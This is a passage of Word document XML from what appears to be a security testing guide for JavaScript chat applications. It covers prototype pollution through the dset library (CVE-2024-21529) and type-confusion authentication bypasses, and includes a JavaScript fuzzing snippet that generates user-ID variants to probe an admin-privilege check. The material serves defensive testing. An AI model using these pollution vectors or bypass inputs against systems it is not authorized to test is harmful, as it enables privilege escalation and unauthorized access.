      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Room configuration updates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Modifying privacy settings and access controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Message metadata processing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Handling file upload metadata and content attributes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Social feature settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Managing friend lists and notification preferences</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each integration point where your chat application uses dset (or similar utilities) to process user-controlled data represents a potential prototype pollution attack vector that could compromise authentication logic across your entire platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Systematic Discovery of Library-Based Prototype Pollution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Traditional testing validates normal profile updates using expected input patterns: changing usernames, updating bio text, modifying notification settings through UI controls. Manual testing never explores crafted JSON payloads containing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">proto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">constructor.prototype</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, or other pollution vectors targeting utility library vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The systematic approach reveals both whether your chat application uses vulnerable versions of libraries like dset, and whether your usage patterns create exploitable prototype pollution conditions. Generate pollution payloads targeting specific utility library vulnerabilities, then monitor how corruption propagates through your chat application architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection requires monitoring global object state before and after user input processing operations that invoke utility libraries. Verify that prototype modifications don’t persist beyond individual requests. Check whether clean objects retain expected behavior after profile updates complete. Confirm that authentication and authorization logic continues functioning correctly when processing subsequent requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Hidden Risk of Utility Library Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The dset vulnerability illustrates a broader security challenge in modern JavaScript development: trusted utility libraries can introduce systemic vulnerabilities that affect every component of your chat application. When prototype pollution occurs through library code, the corruption affects not just the immediate operation but every subsequent object interaction throughout your application lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This dependency-based vulnerability model makes prototype pollution particularly insidious in chat applications because:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Universal Impact</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Corruption from one user’s profile update affects authentication logic for all subsequent users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Persistent Effects</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Prototype pollution can survive across multiple request cycles depending on your application architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Trust Assumptions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Developers integrate utilities like dset specifically because they trust the security implications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hidden Attack Surface</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The vulnerability exists in code you didn’t write but your application depends on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understanding prototype pollution through real vulnerabilities like CVE-2024-21529 provides essential context for discovering similar dependency-based security issues in your chat application’s utility library usage patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With prototype pollution vulnerabilities identified and addressed through systematic testing of both your code and your dependencies, attention turns to authentication logic that might contain type-based security bypasses.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="115"/>
    <w:bookmarkStart w:id="116" w:name="X2acc9284c5e53d12f75193c64b8f4d929a4b8bc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication Logic Bypasses: When Permission Checks Fail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your chat application’s security foundation rests on authentication and authorization logic you implemented to control user access to rooms, administrative functions, and sensitive operations. User login verification, room access control, message deletion permissions, and administrative privilege checking all depend on comparison operations and validation logic in code you wrote.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JavaScript’s flexible type system creates opportunities for authentication bypasses when your permission checking logic uses loose equality comparisons or inadequate input validation. These vulnerabilities emerge from seemingly minor implementation details that have significant security implications for your entire chat platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider your room access control logic. Users request to join specific chat rooms by submitting room identifiers through your client interface. Your server-side authorization function retrieves the user’s allowed rooms list and checks whether the requested room identifier appears in that list. This fundamental security control determines whether users can access private conversations, administrative channels, or restricted community spaces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your implementation compares the submitted room identifier with stored allowed room identifiers using JavaScript’s equality operators. When your allowed rooms list contains numeric identifiers but user input arrives as string values, type coercion can bypass your authorization checks entirely. The comparison "123" == 123 returns true in JavaScript, potentially granting access to users who shouldn’t be authorized for specific rooms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This type confusion vulnerability extends throughout your chat application’s security controls. User authentication during login might compare user IDs using loose equality, allowing string representations to match numeric stored values inappropriately. Administrative privilege checking could use similar loose comparisons, enabling privilege escalation through type manipulation. Message ownership validation for editing or deletion might suffer from identical type-based bypass vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your administrative access control illustrates the severe impact of these seemingly minor implementation choices. Administrative users possess elevated privileges for user management, content moderation, and system configuration. Your admin checking logic compares the authenticated user’s identifier with a list of administrative user IDs stored in your application configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When an attacker submits requests with user identifiers crafted to exploit type coercion behavior, they might gain administrative access through comparison operations that don’t enforce strict type matching. Administrative privileges enable account manipulation, content deletion, user banning, and access to sensitive chat application functionality that should remain restricted to legitimate administrators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">But authentication bypasses extend beyond simple type coercion scenarios. Your user identification logic might use parseInt() functions to process user IDs extracted from authentication tokens, URL parameters, or request headers. JavaScript’s parseInt() function exhibits surprising behavior with malformed input that could enable authentication bypass attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When parseInt() processes input like "123abc", it successfully parses the numeric prefix and returns 123 while ignoring the trailing garbage characters. Hexadecimal inputs like "0x7B" get parsed as base-16 numbers, potentially matching decimal user IDs inappropriately. Whitespace-padded inputs like " 123 " still parse successfully, bypassing validation logic that expects clean numeric values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Systematic Type Confusion Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Traditional testing validates normal authentication scenarios using expected data types and properly formatted input. Developers test user login with correct credentials, room access with valid identifiers, administrative functions with legitimate admin accounts. Testing rarely explores type conversion boundaries where unexpected input types bypass security controls through automatic conversion or parsing edge cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Type confusion fuzzing approach</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fuzzAuthenticationCheck</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(data) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> user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data)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Generate mixed data types for user ID</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> userIdVariants </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Original value</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// String conversion</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Number conversion</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        [user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Array wrapper</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">valueOf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> () </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Object wrapper</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        user</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Implicit string conversion</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Implicit number conversion</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">parseInt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(user</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"abc"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Parsing edge cases</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">parseFloat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(user</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">".0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Float conversion</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    userIdVariants</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">forEach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(id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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">checkAdminPrivileges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> id})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">logAuthenticationResult</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(id</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your chat application’s permission system provides multiple targets for authentication bypass testing. Room access control determines which users can join specific chat channels. Administrative privilege checking governs access to user management and content moderation features. Message ownership validation controls editing and deletion permissions. User identification logic throughout these systems processes various input formats that could trigger authentication bypasses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The generation strategy targets type confusion scenarios while remaining focused on your chat application’s specific authentication architecture. Test different data types in place of expected user identifiers: strings where numbers are expected, arrays where primitives are expected, objects where simple values are expected. Focus particularly on values that coerce to expected results through JavaScript’s type conversion rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection requires monitoring authentication decisions and flagging unexpected authorization successes that might indicate bypass vulnerabilities. Track when loose equality comparisons succeed between different data types in security-relevant operations. Verify that parsing operations handle malformed input appropriately without enabling unauthorized access. Confirm that authentication bypasses actually compromise chat application security rather than just violating type expectations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The systematic exploration reveals authentication vulnerabilities specific to your chat application’s permission model rather than generic authentication bypass techniques. You’re testing whether your room access logic, administrative controls, and user identification functions properly validate user permissions under adversarial input conditions designed to exploit implementation weaknesses in code you wrote and control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understanding authentication bypass vulnerabilities in your chat application provides context for examining how input validation logic might exhibit blocking behavior under specific usage patterns.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="116"/>
    <w:bookmarkStart w:id="117" w:name="Xcd2d30e3ceaaa5f14c708a26332dd41937e47ae"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
